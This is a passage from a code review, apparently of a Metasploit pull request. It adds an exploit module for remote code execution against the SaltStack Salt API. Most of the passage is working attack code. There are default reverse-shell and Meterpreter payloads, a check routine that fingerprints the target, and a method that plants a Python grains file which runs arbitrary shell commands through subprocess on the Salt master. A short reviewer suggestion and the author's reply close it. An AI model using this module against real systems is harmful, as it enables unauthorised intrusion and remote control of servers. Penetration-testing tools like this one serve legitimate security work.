modules/exploits/linux/http/saltstack_salt_wheel_async_rce.rb

```diff
@@ -0,0 +1,259 @@
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => :bourne,
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DefaultOptions' => {
+          'WfsDelay' => 90, # The master's maintenance process check cycle is set to 60 sec. by default
+          'SSL' => true     # Salt API uses HTTPS by default
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS] # Payload visible in log if set to DEBUG or TRACE level
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(8000),
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new(
+        'EXTMODSDIR',
+        [
+          true,
+          'The Extension Module Directory ("extmods")',
+          '/var/cache/salt/master/extmods'
+        ]
+      )
+    ])
+  end
+
+  def check
+    fun = 'config.values'
+    res = send_request(fun: fun)
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check.')
+    end
+
+    # Server: CherryPy/8.9.1
+    unless res.headers['Server']&.match(%r{^CherryPy/[\d.]+$})
+      return CheckCode::Unknown('Target does not appear to be running Salt API.')
+    end
+
+    if res.code == 200 && res.get_json_document['return']
+      res_json = res.get_json_document['return'].first
+      if res_json&.key?('tag') && res_json&.key?('jid')
+        return CheckCode::Detected('Salt API responded as expected.')
+      end
+    end
+
+    CheckCode::Safe('Unexpected Salt API response')
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager(background: true)
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    vprint_status("Executing command: #{cmd}")
+
+    @rand_basename = rand_text_alphanumeric(4..12)
+    path = normalize_uri(datastore['EXTMODSDIR'], 'grains', "#{@rand_basename}.py")
+    register_file_for_cleanup(path)
+
+    cmd.gsub!("'", "\\\\'")
+    data = <<~PYTHON
+      import subprocess
+      def #{rand_text_alpha(6..8)}():
+          subprocess.Popen('#{cmd}', shell=True)
+          return {}
+    PYTHON
+
+    send_request(data: data, path: path)
+    vprint_status(
+      'Waiting for the Salt maintenance process check to trigger the payload. '\
+      'This could take some time...'
+    )
```

Comment:
```suggestion
    vprint_status("Waiting up to #{wfs_delay} seconds for the Salt maintenance process check to trigger the payload.")
```

Untested, but you can tell the user exactly how long it'll wait.

Reply:
Great! I agree, it is a way better with this, thanks!